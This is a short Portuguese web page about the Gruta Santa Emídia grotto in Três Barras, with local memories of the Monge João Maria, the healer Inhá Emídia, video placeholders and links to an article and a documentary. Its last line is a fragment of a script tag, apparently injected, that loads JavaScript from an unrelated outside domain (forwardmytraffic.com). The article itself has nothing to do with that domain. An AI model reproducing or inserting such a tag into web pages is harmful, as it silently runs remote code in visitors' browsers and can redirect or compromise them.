Em Três Barras, a Gruta Santa Emídia é um dos marcos da passagem do Monge João Maria e da presença da curandeira, parteira e benzedeira Inhá Jacinta ou Inhá Emídia. A denominação popular varia entre diferentes autores.
Numa roda de chimarrão com Dona Lydia Jientara Chikalski, de 89 anos de idade, foi possível conhecer histórias sobre o Monge João Maria. Respeito a natureza, poder de cura e profecias fazem parte de suas memórias.
Vídeo 1
Segundo Dona Lydia, as profecias do monge, para o trabalho doméstico, não foram das melhores.
Video 2
Consta que o monge batizou João Batista Pacheco, filho de Leocádio Pacheco e Rosa Pacheco dos Santos Lima. Deste episódio provém o padroeiro do município de Três Barras. Dona Rosa teria escolhido São João Batista como santo da primeira igreja.
O historiador Dr. Eloy Tonon, relata sobre as peregrinações nas grutas em busca da cura e do batismo. (Extraído do documentário: As águas do monge)
Video 3
Para aqueles que ainda não conhecem a Gruta Santa Emídia, fica a dica de um passeio agradável, em meio a natureza e a presença da religiosidade popular.
Para saber mais:
Ermida: significa capela fora do povoado ou pequena igreja, ou ainda, ermida é o local onde vive o eremita, aquele que prefere a vida solitária longe das aglomerações humanas.
Artigo de Fernando Tokarski: “A ermida de São João Maria e a invenção de Santa Emídia”. Disponível em: https://www.ecosdocontestado.com/capitulos-de-livros
Documentário: As águas do monge.
Disponível em: www.ecosdocontestado.com/documentarios
… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>